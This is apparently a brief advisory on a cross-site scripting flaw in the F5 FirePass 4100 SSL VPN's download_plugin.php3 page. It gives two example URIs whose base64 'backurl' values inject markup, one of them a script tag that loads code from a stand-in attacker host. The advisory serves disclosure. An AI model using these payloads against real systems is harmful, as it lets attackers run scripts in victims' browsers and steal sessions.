F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability

F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability

Attackers can exploit this issue via a browser.

The following example URIs demonstrate this issue:

https://www.example.com/download_plugin.php3?js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==
https://www.example.com/download_plugin.php3?js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gdGVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i